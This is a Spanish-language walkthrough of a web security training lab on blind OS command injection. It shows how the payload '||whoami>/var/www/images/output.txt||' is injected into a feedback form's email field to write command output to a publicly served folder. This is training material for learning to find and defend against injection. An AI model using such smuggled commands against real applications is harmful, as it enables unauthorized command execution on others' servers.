# 03 Lab: Blind OS command injection with output redirection ## Objetivo > This lab contains a blind OS command injection vulnerability in the feedback function. > > The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at: > > ``` > /var/www/images/ > ``` > > The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file. > > To solve the lab, execute the `whoami` command and retrieve the output. ## Solución > Suponemos que la funcionalidad de feedback se realiza usando el siguiente script: ```bash mail -s "This site is great" -a From:peter@normal-user.net feedback@vulnerable-website.com ``` 1. Evaluamos la sección de Feedback a travez del repeater, los campos `email` ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-e11f7a0f6ee29636a47f1a2285d85484104e47c1%2Fimage.png?alt=media) 2. Añadimos `||whoami>/var/www/images/output.txt||` en el campo `email` , con el espacio an inicio, para añadir una instrucción extra. Quedando de la siguiente manera la ejecución, ocasionando la escritura de un archivo, recordemos que debemos elegir una dirección u archivo correcto, ademas que sabemos, el directorio tiene permiso de escritura: ```bash mail -s "This site is great" -a From:peter@normal-user.net feedback@vulnerable-website.com **||whoami>/var/www/images/output.txt||** ``` ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-b2b692a13ef2f31c09903fda129624bea05f647f%2Fimage%201.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-abc2fcf2aaa013d57251afe699b59124a3f26b1a%2Fimage%202.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-c83c72fa39891afc4ed10a8432b1ff65618a1580%2Fimage%203.png?alt=media)